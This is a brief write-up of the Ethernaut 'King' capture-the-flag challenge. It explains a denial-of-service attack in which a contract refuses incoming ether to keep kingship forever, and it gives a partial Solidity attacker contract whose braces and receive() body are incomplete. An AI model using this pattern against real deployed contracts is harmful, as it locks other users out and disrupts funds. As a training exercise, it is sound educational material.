Ethernaut - King

Alex Sieusahai · May 12, 2022

Ethernaut - King

This uses cmichel’s Ethernaut solutions repo as a template, hence the similarities.

Initial insights

Immediately, we can see from looking at the contract that the contract depends on the current king getting their ether back. In paritcular, in the receive() function, king.transfer(msg.value) must pass in order for kingship to be transferred; we can use an age old DoS style fallback attack to claim kingship forever.

The exploit

This is extremely short as the scope is just fallback DoS style:

pragma solidity ^0.7.3;

interface IKing {
    function changeOwner(address _owner) external;

contract KingAttacker {
    IKing public challenge;

    constructor(address challengeAddress) {
        challenge = IKing(challengeAddress);

    function attack() external payable {
        payable(address(challenge)).call{value: msg.value}("");

    receive() external payable {

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